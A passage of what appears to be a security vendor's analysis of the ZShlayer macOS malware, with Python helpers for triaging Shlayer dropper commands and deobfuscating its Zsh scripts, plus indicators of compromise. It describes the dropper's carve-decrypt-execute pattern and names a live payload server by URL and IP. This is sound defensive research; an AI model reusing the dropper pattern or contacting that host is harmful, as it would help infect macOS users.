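    "tail -c +1025 /var/log/system.log | gzip -c > /tmp/tail.gz",
]

CIPHER_FLAG = re.compile(r"^-(aes|des|bf|camellia|rc4|chacha)")
SEPARATORS = {"|", "||", "&&", ";"}


def split_commands(argv):
    """Cut a shlex-tokenised line into simple commands at |, ||, && and ;."""
    commands, current = [], []
    for tok in argv:
        if tok in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def triage(cmdline):
    """Pull the analyst-relevant fields out of a Shlayer-style dropper command line."""
    info = {
        "offset": None,            # N in `tail -c +N`: where the encrypted blob starts
        "carrier": None,           # file whose tail holds the blob (here a "png")
        "cipher": None,            # openssl cipher flag, without the dash
        "digest": None,            # -md value fed to EVP_BytesToKey
        "password": None,          # the part after `pass:`
        "dropped": None,           # -out path of the decrypted payload
        "decrypts": False,         # openssl enc run with -d
        "chmod_777": False,
        "executes_dropped": False,
        "cleanup": False,          # rm of the dropped file afterwards
    }
    for argv in split_commands(shlex.split(cmdline)):
        name = os.path.basename(argv[0])
        if name == "tail" and "-c" in argv[1:-1]:
            offset = argv[argv.index("-c") + 1]
            if offset.startswith("+") and offset[1:].isdigit():
                info["offset"] = int(offset[1:])
                info["carrier"] = argv[-1]
        elif name == "openssl" and len(argv) > 1 and argv[1] == "enc":
            info["decrypts"] = "-d" in argv
            for i, arg in enumerate(argv):
                nxt = argv[i + 1] if i + 1 < len(argv) else None
                if CIPHER_FLAG.match(arg):
                    info["cipher"] = arg[1:]
                elif arg == "-md" and nxt:
                    info["digest"] = nxt
                elif arg == "-out" and nxt:
                    info["dropped"] = nxt
                elif arg == "-pass" and nxt and nxt.startswith("pass:"):
                    info["password"] = nxt[len("pass:"):]
        elif name == "chmod" and len(argv) > 2 and argv[1] == "777":
            info["chmod_777"] = True
        elif name == "rm" and info["dropped"] in argv:
            info["cleanup"] = True
        elif info["dropped"] and argv[0] == info["dropped"]:
            info["executes_dropped"] = True
    return info


def is_shlayer_like(cmdline):
    """Classic Shlayer shape: carve with tail, decrypt with an inline openssl password,
    drop the result, then execute it. Each piece on its own is legitimate."""
    info = triage(cmdline)
    return bool(info["offset"] and info["decrypts"] and info["password"] is not None
                and info["dropped"] and info["executes_dropped"])


def replay_command(info, out_path="payload.bin"):
    """Rebuild an openssl command that writes the decrypted payload to a file for static
    analysis instead of running it. -md is carried over when present: OpenSSL >= 1.1.0
    defaults to sha256, so dropping the malware's -md md5 would derive the wrong key."""
    needed = ("offset", "carrier", "cipher", "password")
    missing = [k for k in needed if info[k] is None]
    if missing:
        raise ValueError("triage data incomplete: " + ", ".join(missing))
    md = f" -md {info['digest']}" if info["digest"] else ""
    return (f"tail -c +{info['offset']} {shlex.quote(info['carrier'])} | "
            f"openssl enc -{info['cipher']}{md} -d -A -base64 "
            f"-pass {shlex.quote('pass:' + info['password'])} -out {shlex.quote(out_path)}")


if __name__ == "__main__":
    result = triage(SHLAYER_CMD)
    print("shlayer-like:", is_shlayer_like(SHLAYER_CMD))
    print(replay_command(result))
```

Run the printed replay command on a copy of the mounted image in an isolated VM; the -A flag matters because the blob is single-line base64, and the output file should go to a scratch directory rather than /tmp so nothing on the host mistakes it for the live dropper.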

But Shlayer has been up to other tricks since June of 2020 that have been helping it avoid the static signatures employed by most vendors. Although bypassing Apple’s Notarization checks is obviously a headline grabber, this new variant of Shlayer utilizes heavily obfuscated Zsh scripts and is in fact far more prolific in the wild. Let’s take a look at how this new variant works.

Inside the New ZShlayer Variant

Whereas earlier versions of Shlayer like Shlayer.a came as shell script executables on a removable .DMG disk image, the new ZShlayer malware goes back to using a standard Apple application bundle inside the .DMG.

In place of a Mach-O in the MacOS folder, we instead find this heavily obfuscated Zsh script (only partially shown in the image below):

In the Resources folder, we find two base64 encoded text files.

The entire bundle is codesigned, but it has not been notarized, indicating that the malware is either intended as a payload for macOS 10.14 or earlier installations or that victims will have to be socially engineered into overriding the Notarization check. Unlike many other samples we have seen since Catalina was released last year, this one did not include graphical instructions to help the user bypass Apple’s built-in security checks.

This particular sample (c561d62c786c757a660c47d133b6d23e030a40c4aa08aebe44b8c4a7711da580), which dates back to early August, has already had its certificate revoked by Apple.

Despite that, due to the use of the Zsh obfuscation, it’s not particularly well-recognized by static signature scanners on VirusTotal, even as of today.

Decoding the First Stage, Zsh Script Payload

In the following, we’ll use this sample as our example:

05b0a4a31f38225d5ad9d133d08c892645639c4661b3e239ef2094381366cb62

But the same general method should work across all ZShlayer samples noted at the end of this post.

The Zsh script located in the bundle’s MacOS folder may seem fairly impenetrable at first glance, as indeed it is intended to:

Seeing from the shebang that it’s a shell script, however, immediately tells us that we can isolate each command by introducing a line break at every semicolon (watch for semicolons inside quoted strings, which a blind replace would split as well and which then need rejoining).

In BBEdit or similar text editor, we can simply search and replace every semicolon with a semicolon and newline:

Looking toward the end of that output, we can clearly see now where the variable definitions end and the execution logic begins, at line 164:

Note in particular the variable TWm, defined on the penultimate line and executed at line 164. This variable name will prove key as we try to deobfuscate the code.

In order to do that, we’ll first save this modified version of the script with the line breaks to local disk so that we can use it as input to a Python script for decoding. Our script first replaces each variable reference with the unicode escape string assigned to that variable. Now the line that gets executed looks something like this:

We can echo that code on the command line and print out the unicode in plain text using printf. The full ZShlayer_decode.py script is available here. Here’s what all the above looks like.

And the output:
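The three steps above (split the one-liner into statements, substitute each variable reference with the escape string it was assigned, then do what printf does and turn the escapes into characters) as a self-contained script. This is an added example, not the post's ZShlayer_decode.py. The obfuscated script it decodes is a constructed stand-in that follows the layout the post describes (short variable names holding \u escape fragments, a TWm variable assembled from them, printf on the execution line); the decoded command is a harmless placeholder, and the variable names other than TWm, the use of eval, and the escape forms handled are assumptions. Nothing is executed: the shell is emulated only to the extent of string assignment and expansion.

```python
import re

# Constructed sample modelled on the layout the post describes for a ZShlayer
# first stage: a single semicolon-separated Zsh line, short random variable
# names holding "\uXXXX" escape fragments, a final variable (TWm) assembled
# from the others, and an execution line that feeds it to printf. The
# fragments decode to a harmless placeholder command; this is not the real
# malware script, and the names other than TWm are invented.
SAMPLE_SCRIPT = (
    "#!/bin/zsh\n"
    'KqV="\\u0074\\u0061\\u0069\\u006c";'
    'oPx="\\u0020\\u002d\\u0063\\u0020\\u002b\\u0031\\u0033\\u0038\\u0031\\u0020";'
    'zRw="\\u0022\\u0024\\u0030\\u0022";'
    'gHt="\\u0020\\u007c\\u0020\\u006f\\u0070\\u0065\\u006e\\u0073\\u0073\\u006c'
    '\\u0020\\u0065\\u006e\\u0063\\u0020\\u002d\\u0064";'
    'TWm="$KqV$oPx$zRw$gHt";'
    'eval "$(printf "$TWm")"'
)

ASSIGN = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*)$", re.S)
VAR_REF = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")
# Escape forms printf understands: \uXXXX, \xXX and octal \NNN.
ESCAPE = re.compile(r"\\u([0-9A-Fa-f]{4})|\\x([0-9A-Fa-f]{2})|\\([0-7]{1,3})")


def split_statements(script):
    """Split on ';' and newlines, but not inside single or double quotes
    (a plain search-and-replace on ';' would also cut quoted strings).
    Backslash-escaped quotes are not handled."""
    statements, current, quote = [], [], None
    for ch in script:
        if quote:
            current.append(ch)
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            current.append(ch)
        elif ch in ";\n":
            if "".join(current).strip():
                statements.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    if "".join(current).strip():
        statements.append("".join(current).strip())
    return statements


def unquote(value):
    """Strip one layer of matching surrounding quotes."""
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
        return value[1:-1]
    return value


def expand(text, env):
    """Replace $NAME / ${NAME} with the raw string assigned to NAME. Using a callable
    replacement keeps the backslashes in those values from being re-interpreted."""
    return VAR_REF.sub(lambda m: env.get(m.group(1), m.group(0)), text)


def decode_escapes(text):
    """Do what `printf` does to the assembled string: turn escapes into characters."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 16))
        return chr(int(m.group(3), 8))
    return ESCAPE.sub(repl, text)


def deobfuscate(script):
    """Return (payload_variable, decoded_command) without executing anything."""
    env, executed = {}, None
    for stmt in split_statements(script):
        if stmt.startswith("#"):
            continue                                  # shebang / comments
        m = ASSIGN.match(stmt)
        if m:
            # Resolve references to earlier variables at definition time, as the shell would.
            env[m.group(1)] = expand(unquote(m.group(2)), env)
        else:
            executed = stmt                           # last non-assignment: the execution line
    if executed is None:
        raise ValueError("no execution line found")
    referenced = [name for name in VAR_REF.findall(executed) if name in env]
    payload_var = referenced[-1] if referenced else None
    raw = env[payload_var] if payload_var else expand(executed, env)
    return payload_var, decode_escapes(raw)


if __name__ == "__main__":
    var, cmd = deobfuscate(SAMPLE_SCRIPT)
    print(f"{var} -> {cmd}")
```

Point deobfuscate() at the contents of the bundle's MacOS script to get the second-stage command the execution line would have handed to the shell; if a sample uses $'...' quoting instead of printf, the same escape decoder still applies, since zsh interprets the same \u sequences there.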

ZShlayer Second-Stage Payload

You’ll notice from the output that the decoded Zsh script takes as input only the smaller of the two encoded files from the Resources folder; in this case, the smaller file is called “tun_kibitzers_Babbitt”. If we echo the output from this decoded script to the command line, we’ll see why:

Our ZShlayer script decodes into a trademark Shlayer Bash script which now takes the larger file (here called “profanations_detraction”) and outputs it to a newly-created application bundle in the /tmp folder. Classic Shlayer behavior.

Let’s take that script and comment out the last two lines so that we can get the output while still preventing execution:

The unzipped Player.app now in the /tmp folder looks like a duplicate of the one on the original disk image, with the same executable name as the parent and another Bash script in the Resources folder also called “tun_kibitzers_Babbitt” (in this case). However, note the size is different:

Decoding the new script shows that it drops and executes yet another layer of Bash shell scripting. Here’s the head and tail (sandwiched between the two is a huge chunk of base64):

If you followed (or want to check out) our earlier Scripting Macs with Malice post, you’ll recognize that this is the Shlayer.d variant we wrote about there. The output of

"$(_m "$_t" "$_y")"

is almost identical to the Shlayer.d sample we wrote about earlier; the most significant difference being a new URL from which to retrieve the final payload:

http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203

The final payload from this point depends on the context of the executing device. As can be seen above, the script gathers OS version, a session UID and machine ID, all of which it posts to the server for processing.

The server, which appears to have been up for at least two months, is not recognized as malicious on VirusTotal and is currently active with a 200 status code.

As Shlayer payloads have been discussed in detail by other researchers, we refer further analysis of the final payload to already published work such as here and here.

How Prevalent is ZShlayer in the Wild?

Searching for ZShlayer on VirusTotal reveals a large number of individual samples and shows that this variant has been active since late June 2020. As of today, our latest retrohunt showed 172 samples. Some of the parent DMGs of these samples have a detection ratio of 0/58 on VT, meaning no engine flagged them at all.

Conclusion

The ZShlayer variant of the Shlayer malware on top of the recent Shlayer campaign abusing Apple’s Notarization service is clear evidence that these threat actors are continuing to evolve and are pursuing multiple campaigns against macOS users. A multi-engined behavioral AI solution that can detect malware based on its behavior rather than relying solely on file characteristics continues to be the best way to protect your macOS fleet. If you would like to see how SentinelOne can help protect your business, contact us today or request a free demo.

Indicators of Compromise

ZShlayer Scripts
269d5f15da3bc3522ca53a3399dbaf4848f86de35d78c636a78336d46c23951c
e3292268c1d0830e76c3e80b4ea57921b9171027e07f064ef3b867b6d0450191
93ff20ff59d4e82e9c0e3b08037c48886dc54b8ed37c19894e0a65c1af8612f6
c561d62c786c757a660c47d133b6d23e030a40c4aa08aebe44b8c4a7711da580
16885c2443b610d80b30828b1445ca326adb727c48f06d073e4dcb70fe3e5c2e
1bc5d3cb3d885fad8230e01dc5f86145d16ed5552a0fa8725689635b96b681e1

Parent DMGs
f6cb7f9593d85f0cd1e81d5b9f520b74d9bf5e829206cefe05b956c0f7638c28
3e20c0b2979a368c7d38cf305f1f60693375165bb76150ad80dbd34e7e0550ed
c319761789afb6aa9cddadf340dfa2d4d659e4b420d6dfde9640cdc4c1d813b7
823c4d39b0d93a1358b4fa02539868944ce15df91f78a1142be26edf07a64a5a
45d50559f73e7c12f1d9aa06283182cb67ac953d285f044e77447569ca8a278c
f94c8712dd7716cfeac79e6e59fdca07db4452c5d239593f421f97246ee8ef41

Domains
http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203

